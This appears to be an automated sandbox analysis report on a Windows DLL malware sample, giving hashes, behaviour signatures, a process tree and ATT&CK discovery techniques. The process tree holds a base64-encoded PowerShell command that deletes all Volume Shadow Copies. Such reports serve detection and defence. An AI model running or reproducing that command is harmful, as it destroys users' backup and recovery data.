Analysis

  • max time kernel
    90s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    15-06-2022 00:57

General

  • Target

    2bc93648ffc475cd4e5258f381132866cddfd8c0d5adf6be3d6218cb750ac5f3.dll

  • Size

    164KB

  • MD5

    ea08eab00bd36a9669d4594e3e1a219e

  • SHA1

    b936291ce6ff28985aaec7d9369bb6af3e4caf7a

  • SHA256

    2bc93648ffc475cd4e5258f381132866cddfd8c0d5adf6be3d6218cb750ac5f3

  • SHA512

    001f046068e93f65d5c975571e4e13662e79d2390c49d3eb0caa68848d609528f0c51b2bb948d6ed110f3e75235574a1e2e8603e6866ecd81b1d81cb051a2959

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\2bc93648ffc475cd4e5258f381132866cddfd8c0d5adf6be3d6218cb750ac5f3.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\2bc93648ffc475cd4e5258f381132866cddfd8c0d5adf6be3d6218cb750ac5f3.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4580
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:548
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4716
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2688

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/548-131-0x0000000000000000-mapping.dmp
    • memory/548-132-0x00000275E9E90000-0x00000275E9EB2000-memory.dmp
      Filesize

      136KB

    • memory/548-133-0x00007FF8BA280000-0x00007FF8BAD41000-memory.dmp
      Filesize

      10.8MB

    • memory/548-134-0x00007FF8BA280000-0x00007FF8BAD41000-memory.dmp
      Filesize

      10.8MB

    • memory/4580-130-0x0000000000000000-mapping.dmp